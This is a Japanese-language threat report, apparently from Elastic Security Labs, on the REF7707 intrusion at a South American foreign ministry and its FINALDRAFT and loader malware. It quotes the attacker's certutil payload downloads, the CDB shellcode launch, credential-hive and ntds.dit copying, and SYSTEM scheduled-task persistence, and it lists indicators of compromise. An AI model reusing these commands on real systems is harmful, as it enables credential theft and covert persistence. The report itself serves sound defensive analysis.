REF7707まとめ
Elastic Security Labsは、東南アジアの他の侵害と関連している南米の国の外務省を標的としたキャンペーンを監視しています。このキャンペーンはREF7707として追跡されます。
REF7707キャンペーンは、よく設計された、非常に有能な新しい侵入セットによって特徴付けられますが、キャンペーンの所有者は、不十分なキャンペーン管理と一貫性のない回避方法を示しました。
REF7707が使用する侵入セットには、FINALDRAFT、GUIDLOADER、PATHLOADERと呼ばれる新しいマルウェアファミリが含まれています。その機能と機能の詳細な分析は、REF7707 - You've Got Malware: FINALDRAFT Hides in Your Draftのマルウェア分析レポートで提供しています。
重要なポイント
- REF7707は、複数のターゲットに対して新しいマルウェアを活用しました
- FINALDRAFTマルウェアには、WindowsとLinuxの両方の亜種があります
- REF7707、エンドポイントの実行を取得するために一般的でないLOLBinを使用しました
- C2のクラウドおよびサードパーティサービスの多用性
- 攻撃者は、このキャンペーンで使用されていない追加のマルウェアとインフラストラクチャを公開する脆弱な運用セキュリティを使用しました
キャンペーン概要
2024年11月下旬、Elastic Security Labsは、南米の外務省でエンドポイントの行動アラートが密集していることを確認しました。調査が進むにつれ、新しいマルウェア、高度な標的型、成熟した運用リズムなど、無秩序に広がるキャンペーンと侵入のセットが発見されました。
キャンペーンの一部では、高いレベルの計画性と技術的能力が示されていましたが、数多くの戦術的な見落としにより、マルウェアの試作サンプル、インフラストラクチャ、および追加の被害者が明らかになりました。
キャンペーン レイアウト (ひし形モデル)
Elastic Security Labsは、 ダイヤモンドモデル を使用して、敵対者、能力、インフラストラクチャ、侵入の被害者間の高レベルの関係を記述します。ダイヤモンドモデルは、単一の侵入とアクティビティスレッド(セクション8)を活用してインシデント間の関係を作成する場合に最も一般的に使用されますが、敵対者中心(セクション7.1.4)ですこのアプローチでは、雑然としているものの、1つのダイヤモンドが可能です。
実行フロー
プライマリ実行チェーン
REF7707当初は、南米の国の外務省のElasticセキュリティテレメトリーを通じて特定されました。Microsoftのcertutilアプリケーションを使用して、リモートサーバーからファイルをダウンロードしてローカルに保存する一般的なLOLBin戦術を観察しました。
certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData\fontdrvhost.exe
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData\fontdrvhost.rar
certutil -urlcache -split -f https://[redacted]/config.ini C:\ProgramData\config.ini
certutil -urlcache -split -f https://[redacted]/wmsetup.log C:\ProgramData\wmsetup.logfontdrvhost.exe、fontdrvhost.rar、config.ini、およびwmsetup.logをホストするWebサーバーは、同じ組織内にありました。ただし、Elastic Agent は実行されていませんでした。これは、最初に観測された横方向の動きであり、侵入についての洞察を提供しました。これらのファイルについては後で詳しく説明しますが、今のところ、 fontdrvhost.exe はデバッグツールであり、 config.ini は武器化されたINIファイルであり、 fontdrvhost.rar 回復可能ではありませんでした。
WinrsHost.exe
Windows リモート管理のリモート シェル プラグイン (WinrsHost.exe) を使用して、接続されたネットワーク上の不明なソース システムからこのシステムにファイルをダウンロードしました。プラグインは、Windows リモート管理で使用されるクライアント側のプロセスです。これは、攻撃者がすでに有効なネットワーク認証情報を所有しており、環境内の以前に侵害されたホストからの横移動にそれらを使用していたことを示しています。これらの資格情報がどのように取得されたかは不明です。資格情報は、疑わしいファイルをホストしている Web サーバーから取得された可能性があります。
攻撃者は、 fontdrvhost.exe、 fontdrvhost.rar、 config.ini、および wmsetup.log を C:\ProgramData\ ディレクトリにダウンロードしました。そこから、攻撃者は他のいくつかのWindowsエンドポイントに移動しました。公開されたすべての認証情報を特定することはできませんが、これらのファイルをダウンロードするためにローカル管理者アカウントを使用していることに注目しました。
Webサーバーからエンドポイントへのダウンロードに続いて、一連の動作ルールが立て続けに実行されていることがわかりました。
6 つの Windows システムでは、 Services.exeの子として未確認のバイナリ (08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1) の実行が観察されました。この疑わしいバイナリは、 .exe 拡張子を持つ6つのキャメルケース文字で構成される擬似ランダムに割り当てられたファイル名を使用し、 C:\Windows\ パスにあります(例: C:\Windows\cCZtzzwy.exe)。このファイルを分析のために収集することはできませんでしたが、ファイルサイズ(170,495バイト)とその場所から、これはPATHLOADERの亜種であると推測されます。このファイルは、SMB を使用してシステム間で渡されました。
FontDrvHost.exe
攻撃者は、 fontdrvhost.exe、 fontdrvhost.rar、 config.ini、および wmsetup.logを収集したら、 fontdrvhost.exe (cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9)を実行して侵入を続行しました。fontdrvhost.exe は、 Windows 署名付きデバッガ CDB.exeの名前を変更したバージョンです。このバイナリを悪用した攻撃者は、信頼できるバイナリを装って、 config.ini ファイルに配信された悪意のあるシェルコードを実行することができました。
CDB は、 15 年以上前のデバッガーです。疑わしいファイルとともにVirusTotalに送信された頻度を調査したところ、 2021 での活動が増加し、2024年後半から積極的に加速していることがわかります。
CDBは 文書化されたLOLBasファイルですが、それがどのように悪用されるかについての研究はあまり発表されていません。セキュリティ研究者のmrd0xは、CDBの優れた分析を書き、シェルコードの実行、実行可能ファイルの起動、DLLの実行、シェルコマンドの実行、セキュリティソリューションの終了にどのように使用できるかを概説しています(さらに、シェルコードランナーとして使用している 2016 からの古い分析も)。これは目新しいものではありませんが、珍しい攻撃手法であり、他の侵入メタデータと組み合わせて使用することで、キャンペーン間でアクターをリンクさせることができます。
config.iniは分析のために収集されませんでしたが、シェルコードをロードするメカニズムが含まれていましたfontdrvhost.exe。呼び出された方法は、FINALDRAFTと似ています。
C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe-cf- スクリプト ファイルのパスと名前を指定します。このスクリプト ファイルは、デバッガーが起動するとすぐに実行されますconfig.ini- これはロードされるスクリプトです-o- ターゲット アプリケーションによって起動されたすべてのプロセスをデバッグします
次にfontdrvhost.exemspaint.exeを生成し、シェルコードを注入しました。
Elastic Security Labsのリバースエンジニアは、このシェルコードを分析して、FINALDRAFTマルウェアを特定し、特徴付けました。最後に、 fontdrvhost.exe は、FINALDRAFTマルウェアとしても識別された追加のシェルコードをメモリ(6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3)に挿入しました。
FINALDRAFTの分析 で説明したように、インジェクション関連のコマンドにターゲットパラメータが指定されていない場合、マルウェアはデフォルトでmspaint.exe conhost.exeまたは になります。
接続性チェック
攻撃者は、 ping.exe コマンドとPowerShellを使用して、いくつかの接続テストを実行しました。
Powershell の Invoke-WebRequest コマンドレットは、Web リソースの内容をプルダウンする wget や curl, に似ています。このコマンドレットは、コマンド ラインからツールをダウンロードするために使用できますが、ここではそうではありませんでした。これらの要求は、いくつかの pingとの関連で、接続チェックである可能性が高くなります。
graph.microsoft[.]com login.microsoftonline[.]comは、MicrosoftのOutlookクラウド電子メールサービスおよびその他のOffice 365 製品のAPIおよびWebGUIトラフィックを提供する合法的に所有されているMicrosoftサイトです。
ping graph.microsoft[.]comping www.google[.]comPowershell Invoke-WebRequest -Uri \"hxxps://google[.]com\Powershell Invoke-WebRequest -Uri \"hxxps://graph.microsoft[.]com\" -UseBasicParsingPowershell Invoke-WebRequest -Uri \"hxxps://login.microsoftonline[.]com\" -UseBasicParsing
digert.ictnsc[.]com そして support.vmphere[.]com は敵対者が所有するインフラストラクチャでした。
ping digert.ictnsc[.]comPowershell Invoke-WebRequest -Uri \"hxxps://support.vmphere[.]com\" -UseBasicParsing
これらのネットワークドメインについては、以下のインフラストラクチャセクションで詳しく説明します。
偵察/列挙/クレデンシャルハーベスティング
攻撃者は、diskshadow.exe ユーティリティを使用して SoftwareDistribution.txt という不明なスクリプトを実行し、SAM、SECURITY、および SYSTEM レジストリ ハイブを抽出し、Active Directory データベース (ntds.dit) をコピーしました。これらの資料には、主に資格情報と資格情報のメタデータが含まれています。攻撃者は 7zip ユーティリティを使用して結果を圧縮しました。
diskshadow.exe /s C:\\ProgramData\\SoftwareDistribution.txt
cmd.exe /c copy z:\\Windows\\System32\\config\\SAM C:\\ProgramData\\[redacted].local\\SAM /y
cmd.exe /c copy z:\\Windows\\System32\\config\\SECURITY C:\\ProgramData\\[redacted].local\\SECURITY /y
cmd.exe /c copy z:\\Windows\\System32\\config\\SYSTEM C:\\ProgramData\\[redacted].local\\SYSTEM /y
cmd.exe /c copy z:\\windows\\ntds\\ntds.dit C:\\ProgramData\\[redacted].local\\ntds.dit /y
7za.exe a [redacted].local.7z \"C:\\ProgramData\\[redacted].local\\\"攻撃者は、システムとドメインに関する情報も列挙しました。
systeminfo
dnscmd . /EnumZones
net group /domain
C:\\Windows\\system32\\net1 group /domain
quser
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID
reg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"
reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"永続化
永続性は、名前が変更された CDB.exe デバッガーと武器化された INI ファイルを毎分呼び出すスケジュールされたタスクを使用して実現されました SYSTEM.この方法論により、FINALDRAFTは記憶に残るようになりました。
schtasks /create /RL HIGHEST /F /tn \"\\Microsoft\\Windows\\AppID\\EPolicyManager\"
/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\"
/sc MINUTE /mo 1 /RU SYSTEMschtasks- スケジュールされたタスクプログラム/create- 新しいスケジュールされたタスクを作成します/RL HIGHEST- ジョブの実行レベルを指定します。HIGHEST、最高レベルの特権として実行されます/F- 警告を抑制/tn \\Microsoft\\Windows\\AppID\\EPolicyManager\- タスク名、本物そっくりのスケジュールされたタスクをミラーリングしようとしています/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\"- 実行するタスク、この場合は前に説明したfontdrvhost.exeコマンド/sc MINUTE- schedule type: 分間隔で実行するように指定MINUTE/mo 1- 修飾子は、スケジュール間隔の1を定義します/RU SYSTEM- 実行するアカウントを定義します。この状況では、タスクは SYSTEM ユーザーとして実行されます
FINALDRAFT分析
FINALDRAFTおよびPATHLOADERマルウェアの機能とアーキテクチャを説明する技術的な詳細については、 こちらをご覧ください。大まかに言うと、FINALDRAFTは、機能を拡張し、ネットワークトラフィックを内部的に複数の手段でプロキシするアドオンモジュールを受け入れる機能を備えた、優れたエンジニアリングが施されたフル機能のリモート管理ツールです。
FINALDRAFTはさまざまな手段を使用してコマンドアンドコントロールを確立することができますが、最も注目すべきは、被害者の環境で観察された手段である MicrosoftのGraph APIの悪用です。このタイプのサードパーティC2は、2022年12月に報告した SIESTAGRAPHで初めて観察されました。
このコマンド&コントロールタイプは、ネットワークの可視性に大きく依存している組織の防御者にとっては困難です。最初の実行とチェックインが完了すると、それ以降のすべての通信は正規の Microsoft インフラストラクチャ (graph.microsoft[.]com) を介して進行し、他の組織のワークステーションに溶け込みます。また、他の感染したシステムのトラフィックをプロキシするリレー機能もサポートしています。ネットワークベースの侵入検知と脅威インテリジェンスの指標に依存する防御を回避します。
PATHLOADER と GUIDLOADER
PATHLOADER と GUIDLOADER はどちらも、メモリ内の暗号化されたシェルコードをダウンロードして実行するために使用されます。これらは、FINALDRAFTメモリキャプチャ内で特定されたC2インフラストラクチャと文字列を調査しているときに、VirusTotalで発見されました。これらは、FINALDRAFTペイロードと関連してのみ観測されています。
VirusTotal の 5 月 2023 日のサンプルは、REF7707侵入セットの中で最も早く特定されたバイナリです。このサンプルは、タイのWebユーザーによって最初に提出された dwn.exe (9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf)は、 poster.checkponit[.]com および support.fortineat[.]comから暗号化されたFINALDRAFTバイナリをロードするPATHLOADERバリアントです。
2023 年 6 月から 8 月にかけて、Hong Kong VirusTotal の Web ユーザーが GUIDLOADER のサンプルを 12 件アップロードしました。これらのサンプルはそれぞれ、暗号化されたペイロードのダウンロード方法に若干の変更が加えられており、FINALDRAFTドメインを使用するように設定されています。
poster.checkponit[.]comsupport.fortineat[.]com- Google Firebase (
firebasestorage.googleapis[.]com) - ペーストビン (
pastebin[.]com) - 東南アジア大学公開Webストレージシステム
GUIDLOADER のサンプルには、未完成または壊れているように見えるものや、機能しない暗号化解除ルーチンが含まれているものもあれば、バイナリにデバッグ文字列が埋め込まれているものもあります。これらのバリエーションは、サンプルが開発およびテストプロセスの一部であったことを示唆しています。
FINALDRAFT bridging OS’
2024年後半、米国とブラジルの2つのLinux ELF FINALDRAFT亜種がVirusTotalにアップロードされました。これらのサンプルは、同様のC2の汎用性と、Windowsバージョンで使用可能なコマンドの部分的な再実装を特徴としています。URL は、 support.vmphere[.]com、 update.hobiter[.]com、 pastebin.comのこれらのファイルから取得されました。
インフラストラクチャ分析
FINALDRAFTマルウェア分析レポートでは、REF7707侵入で収集されたサンプルからいくつかのドメインが特定され、他のサンプルはコードの類似性によって特定されました。
サービスバナーハッシュ
Censys で hobiter[.]com (前のセクションで説明した FINALDRAFT の ELF バリアントで観察されるドメイン) を検索すると、IP アドレス ( 47.83.8.198) が返されます。このサーバは香港に拠点を置き、ポート 80 と 443にサービスを提供しています。文字列 "hobiter[.]com" は、ポート ID の TLS 証明書に関連付けられ 443。このポートのサービス バナー ハッシュに対する Censys クエリ ピボットにより、そのハッシュを共有する 6 つの追加サーバー (合計 7 つ) が生成されます。
| IP | TLS 証明書の名前 | Cert CN | ポート | ASNの | GEO |
|---|---|---|---|---|---|
47.83.8.198 | *.hobiter[.]com | CloudFlareオリジン証明書 | 80, 443 | 45102 | 香港 |
8.218.153.45 | *.autodiscovar[.]com | CloudFlareオリジン証明書 | 53, 443, 2365, 3389, 80 | 45102 | 香港 |
45.91.133.254 | *.vm-clouds[.]net | CloudFlareオリジン証明書 | 443, 3389 | 56309 | Nonthaburi, タイ |
8.213.217.182 | *.ictnsc[.]com | CloudFlareオリジン証明書 | 53, 443, 3389, 80 | 45102 | Bangkok, Thailand |
47.239.0.216 | *.d-links[.]網 | CloudFlareオリジン証明書 | 80, 443 | 45102 | 香港 |
203.232.112.186 | [なし] | [なし] | 80, 5357, 5432, 5985, 8000, 8080, 9090, 15701, 15702, 15703, 33990 47001 | 4766 | 大田(韓国) |
13.125.236.162 | [なし] | [なし] | 80, 3389, 8000, 15111, 15709, 19000 | 16509 | 仁川(インチョン)、韓国 |
2 つのサーバー (203.232.112[.]186 と 13.125.236[.]162) は、他の 5 つのサーバーと同じプロファイルを共有しません。サービス バナー ハッシュは引き続き一致しますが、ポート 443ではなく、ポート 15701<[> 、 15702、 15703、および 15709にあります。さらに、問題のポートはTLS通信をサポートしていないようです。私たちは、これらを高い信頼性を持ってREF7707に帰していませんが、完全性のために含めています。
オリジナルの「ホビター」サーバーを含む他の5つのサーバーには、いくつかの類似点があります。
- ポートでのサービスバナーハッシュの一致
443 - 東南アジアのジオロケーション
- Windows OS
- Cloudflareが発行したTLS証明書
- ほとんどの場合、Alibaba に属する同じ ASN があります
Hobiter と VMphere
update.hobiter[.]com そして support.vmphere[.]com はELFバイナリ(biosets.rar)で見つかりました12月 13日から、 2024。どちらのドメインも、1年以上前の 12年9月 2023に登録されました。このELFバイナリは、同様のC2の汎用性と、Windows版のFINALDRAFTで使用可能なコマンドの部分的な再実装を特徴としています。
ネームサーバー検索を hobiter[.]com と vmphere[.]com にすると、それぞれに対してCloudflareネームサーバーレコードのみが生成され、Aレコードは得られません。既知のサブドメインを検索すると、Cloudflareが所有するIPアドレスを指すAレコードが得られます。
ICTNSC (英語)
ictnsc[.]com は、攻撃者が実行した接続チェック(ping digert.ictnsc[.]com)から上記のREF7707侵入に直接関連付けられます。このドメイン(8.213.217[.]182)に関連付けられたサーバーは、上記の HTTPS サービスの Censys サービスバナーハッシュを通じて識別されました。他の特定されたインフラストラクチャと同様に、サブドメインはCloudflareが所有するIPアドレスに解決され、親ドメインにはCloudflare NSレコードのみがあります。ictnsc[.]comは2023年2月8日に登録されました。
この関連性が悪意あるものであることは確認できませんが、ドメイン ict.nsc[.]ru は、FRCまたはICTと呼ばれることが多いFederal Research Center for Information and Computational TechnologiesのWebプロパティであることに注意してください。このロシアの組織は、コンピューターモデリング、ソフトウェアエンジニアリング、データ処理、人工知能、ハイパフォーマンスコンピューティングなどのさまざまな分野で研究を行っています。
REF7707侵入では観察されませんでしたが、私たちが観察したドメイン(ictnsc[.]com)には ict サブドメイン(ict.ictnsc[.]com)があり、これは ict.nsc[.]ruと著しく似ています。繰り返しになりますが、それらが正当なFRCまたはITCに関連しているかどうかを確認することはできませんが、脅威アクターはドメインが類似しているか、混同されているか、または互いに混同されることを意図していたようです。
Autodiscovar
Autodiscovar[.]com FINALDRAFTマルウェアに直接関連付けられていません。これは、Web インフラストラクチャ識別子のピボットを通じて、間接的に REF7707 インフラストラクチャに関連付けられています。親ドメインにはCloudflare NSレコードのみがあります。VirusTotal(cloud.autodiscovar[.]com)で識別されるサブドメインは、Cloudflareが所有するIPアドレスを指します。このドメイン名は、他のFINALDRAFTおよびREF7707 Webインフラストラクチャに似ており、HTTPSサービスバナーハッシュを共有します。このドメインは2022年8月26日に登録されました。
D-linksとVMクラウド
d-links[.]net とvm-clouds[.]netはどちらも2023年9月12日に登録されました。これは、hobiter[.]com年とvmphere[.]com日と同じ日です。これらのサイトをホストしているサーバーも、同じ HTTPS サービス バナー ハッシュを共有します。これらのマルウェアは、FINALDRAFTマルウェアに直接関連付けられておらず、以前に登録されていたにもかかわらず、現在ルーティング可能なサブドメイン pol.vm-clouds[.]net ありません。
フォルティニート
support.fortineat[.]com は、PATHLOADER サンプル (dwn.exe) でハードコーディングされています。ドメインの分析中に、現在登録されていないことがわかりました。ドメインと通信している他のサンプルを特定するために、私たちのチームはこのドメインを登録し、着信接続をリッスンするようにWebサーバーを構成しました。
ポート 443経由の接続試行を記録し、特定の着信バイト パターンを特定しました。接続は、東南アジアの8つの異なる通信およびインターネットインフラストラクチャ企業から供給されており、REF7707侵入セットの被害者の可能性があることを示しています。
チェックポニット
poster.checkponit[.]com は、2023年5月から7月にかけて4つのGUIDLOADERサンプルとPATHLOADERサンプルで観察され、FINALDRAFT暗号化シェルコードのホストに使用されました。checkponit[.]com登録は2022年8月26日に作成されました。現在、 checkponit[.]com または poster.checkponit[.]comの A レコードはありません。
サードパーティのインフラストラクチャ
Microsoftの graph.microsoft[.]com は、Graph APIを介したコマンドと制御のために、FINALDRAFT PEおよびELFバリアントによって使用されます。このサービスはユビキタスであり、Office 365を使用している企業の重要なビジネスプロセスに使用されています。防御者は、ビジネスへの影響が理解されていない限り、このドメインをブロックリストに登録しないことを強くお勧めします。
GoogleのFirebaseサービス(firebasestorage.googleapis[.]com)、Pastebin(pastebin[.]com)、および東南アジアの大学は、ローダー(PATHLOADERおよびGUIDLOADER)がFINALDRAFTの最終段階をダウンロードして復号化するための暗号化されたペイロードをホストするために使用されるサードパーティのサービスです。
REF7707タイムライン
まとめ
REF7707は、南米の国の外務省の侵入を調査しているときに発見されました。
調査の結果、FINALDRAFTとそのさまざまなローダーのような新しいマルウェアが明らかになりました。これらのツールは、従来のマルウェア対策ツールでは検出が困難な組み込みのオペレーティング システム機能を使用してデプロイおよびサポートされていました。
FINALDRAFTは、従来のネットワークベースの侵入検知・防止システムにおいて観察可能な悪意ある指標を最小限に抑えるためのコマンド&コントロールにMicrosoft社のグラフAPIサービスを採用しています。暗号化されたペイロードのステージングのためのサードパーティのホスティングプラットフォームも、感染チェーンの早い段階でこれらのシステムに挑戦します。
このレポートの指標を使用したVirusTotalの提出者とピボットの概要は、東南アジアと南アメリカで比較的地理的に存在感が高いことを示しています。同様に、SIESTAGRAPHは、私たちが観測した最初のグラフAPIの悪用であり、(REF2924)東南アジアの国の外務省への攻撃が含まれていました。
Elastic Security Labsでは、知識豊富なプロフェッショナルが運営する情報セキュリティドメイン全体の防御機能を推進し、高度な脅威を最適に軽減します。
MITRE ATT&CKによるREF7707
Elasticは、 MITRE ATT&CK フレームワークを使用して、企業ネットワークに対してAdvanced Persistent Threatが使用する一般的な戦術、手法、手順を文書化しています。
検出REF7707
ヤラ
観測
この研究では、次の観測量について議論しました。
| すぐれた監視性 | タイプ | 名前 | 参考 |
|---|---|---|---|
39e85de1b1121dc38a33eca97c41dbd9210124162c6d669d28480c833e059530 | SHA-256の | Session.x64.dll | ファイナルドラフト |
83406905710e52f6af35b4b3c27549a12c28a628c492429d3a411fdb2d28cc8c | SHA-256の | pfman | ファイナルドラフトエルフ |
f45661ea4959a944ca2917454d1314546cc0c88537479e00550eef05bed5b1b9 | SHA-256の | biosets.rar | ファイナルドラフトエルフ |
9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf | SHA-256の | dwn.exe | パスローダー |
41a3a518cc8abad677bb2723e05e2f052509a6f33ea75f32bd6603c96b721081 | SHA-256の | 5.exe | GUIDローダー |
d9fc1cab72d857b1e4852d414862ed8eab1d42960c1fd643985d352c148a6461 | SHA-256の | 7.exe | GUIDローダー |
f29779049f1fc2d45e43d866a845c45dc9aed6c2d9bbf99a8b1bdacfac2d52f2 | SHA-256の | 8.exe | GUIDローダー |
17b2c6723c11348ab438891bc52d0b29f38fc435c6ba091d4464f9f2a1b926e0 | SHA-256の | 3.exe | GUIDローダー |
20508edac0ca872b7977d1d2b04425aaa999ecf0b8d362c0400abb58bd686f92 | SHA-256の | 1.exe | GUIDローダー |
33f3a8ef2c5fbd45030385b634e40eaa264acbaeb7be851cbf04b62bbe575e75 | SHA-256の | 1.exe | GUIDローダー |
41141e3bdde2a7aebf329ec546745149144eff584b7fe878da7a2ad8391017b9 | SHA-256の | 11.exe | GUIDローダー |
49e383ab6d092ba40e12a255e37ba7997f26239f82bebcd28efaa428254d30e1 | SHA-256の | 2.exe | GUIDローダー |
5e3dbfd543909ff09e343339e4e64f78c874641b4fe9d68367c4d1024fe79249 | SHA-256の | 4.exe | GUIDローダー |
7cd14d3e564a68434e3b705db41bddeb51dbb7d5425fd901c5ec904dbb7b6af0 | SHA-256の | 1.exe | GUIDローダー |
842d6ddb7b26fdb1656235293ebf77c683608f8f312ed917074b30fbd5e8b43d | SHA-256の | 2.exe | GUIDローダー |
f90420847e1f2378ac8c52463038724533a9183f02ce9ad025a6a10fd4327f12 | SHA-256の | 6.exe | GUIDローダー |
poster.checkponit[.]com | ドメイン名 | REF7707インフラストラクチャ | |
support.fortineat[.]com | ドメイン名 | REF7707インフラストラクチャ | |
update.hobiter[.]com | ドメイン名 | REF7707インフラストラクチャ | |
support.vmphere[.]com | ドメイン名 | REF7707インフラストラクチャ | |
cloud.autodiscovar[.]com | ドメイン名 | REF7707インフラストラクチャ | |
digert.ictnsc[.]com | ドメイン名 | REF7707インフラストラクチャ | |
d-links[.]net | ドメイン名 | REF7707インフラストラクチャ | |
vm-clouds[.]net | ドメイン名 | REF7707インフラストラクチャ | |
47.83.8[.]198 | IPv4-アドレス | REF7707インフラストラクチャ | |
8.218.153[.]45 | IPv4-アドレス | REF7707インフラストラクチャ | |
45.91.133[.]254 | IPv4-アドレス | REF7707インフラストラクチャ | |
8.213.217[.]182 | IPv4-アドレス | REF7707インフラストラクチャ | |
47.239.0[.]216 | IPv4-アドレス | REF7707インフラストラクチャ |
参照資料
上記の研究を通じて、以下のことが参照されました。
- https://www.elastic.co/security-labs/finaldraft
- https://mrd0x.com/the-power-of-cdb-debugging-tool/
- https://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
Elastic Security Labsについて
Elasticセキュリティラボは、新たな脅威に関する公開調査を提供することで、脅威の状況にポジティブな変化をもたらすことに専念しています。
X @elasticseclabs でElasticセキュリティラボをフォローし、 www.elastic.co/security-labs/ での調査をご覧ください。この調査で活用したテクノロジーなどについては、 Elasticセキュリティをご覧ください。